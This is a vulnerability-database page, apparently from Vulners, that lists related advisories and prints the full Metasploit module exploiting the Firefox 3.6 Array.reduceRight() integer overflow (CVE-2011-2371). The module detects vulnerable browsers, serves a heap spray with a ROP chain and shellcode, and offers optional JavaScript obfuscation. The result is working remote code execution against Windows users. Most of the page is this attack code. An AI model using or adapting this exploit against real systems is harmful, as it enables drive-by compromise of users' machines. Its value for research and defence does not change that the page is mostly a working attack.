Vulners
Lucene search
Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)
| Reporter | Title | Published | Views | Family All 157 |
|---|---|---|---|---|
 | Mozilla Firefox Array.reduceRight() Integer Overflow Exploit | 11 Oct 201100:00 | – | zdt |
| Mozilla Firefox Array.reduceRight() Integer Overflow | 12 Oct 201100:00 | – | zdt |
| Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit | 27 Feb 201200:00 | – | zdt |
 | Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities | 21 Jun 201100:00 | – | nessus |
| CentOS 4 / 5 : firefox (CESA-2011:0885) | 23 Jun 201100:00 | – | nessus |
10
##
# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Mozilla Firefox Array.reduceRight() Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing abitrary remote code execution.
Please note that the exploit requires a longer amount of time (compare to a
typical browser exploit) in order to gain control of the machine.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 13909 $",
'Author' =>
[
'Chris Rohlf', #Matasano Security (Initial discovery according to Mozilla.org)
'Yan Ivnitskiy', #Matasano Security (Initial discovery with Chris?)
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
],
'References' =>
[
['CVE', '2011-2371'],
['URL', 'http://http://www.exploit-db.com/exploits/17974/'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\xbc\x0c\x0c\x0c\x0c",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
#Windows XP / Vista / 7
[ 'Mozilla Firefox 3.6.16', {} ],
],
'Privileged' => false,
'DisclosureDate' => "Jun 21 2011",
'DefaultTarget' => 0
))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /Firefox\/3\.6\.[16|17]/
vprint_error("This browser is not supported: #{agent.to_s}")
send_not_found(cli)
return
end
#mona.py tekniq! + Payload
rop = [
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x7c348b06, # EBP (NOP)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- VirtualProtect() found in IAT
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x7c348b06, # EDI (filler)
0x7c348b06, # will be patched at runtime (VP), then picked up into ESI
0x7c348b06, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffff82f, # size 20001 bytes
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')
table = [0x4141].pack('v*')
table << [
0x0c000048,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
].pack('V*')
table << [0x4141].pack('v*')
table << [
0x7c370eef,
junk,
].pack('V*')
table << [0x4141].pack('v*')
table << [
0x3410240c,
0x0c00007c,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
0x0c00002e
].pack('V*')
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)
#Pretty much based on Matteo's code except for the size adjustment to avoid a busted heap
js = <<-JS
var applet = document.getElementById('MyApplet');
function spray() {
var ptrs = unescape("#{js_ptrs}");
var bheader = 0x12/2;
var nullt = 0x2/2;
var espoffset = (7340 /2) - ptrs.length;
var esppadding = unescape("%u0c0c%u0c0c");
while(esppadding.length < espoffset) esppadding += esppadding;
esppadding = esppadding.substring(0, espoffset);
var payload = unescape("#{js_payload}");
var tr_padding = unescape("%u0c0c%u0c0c");
while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + payload + tr_padding;
var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);
HeapBlocks = new Array()
for (i=0;i<0x60;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = new Array;
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f,1,2,3);
JS
js = js.gsub(/^\t\t/, '')
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
html = <<-HTML
<html>
<head>
</head>
<body>
<APPLET id="MyApplet" code="trigger.class" width=150 height=50>
You need a Java-enabled browser to pwn this.
</APPLET>
<script>
#{js}
</script>
</body>
<html>
HTML
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Oct 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 210
EPSS0.86212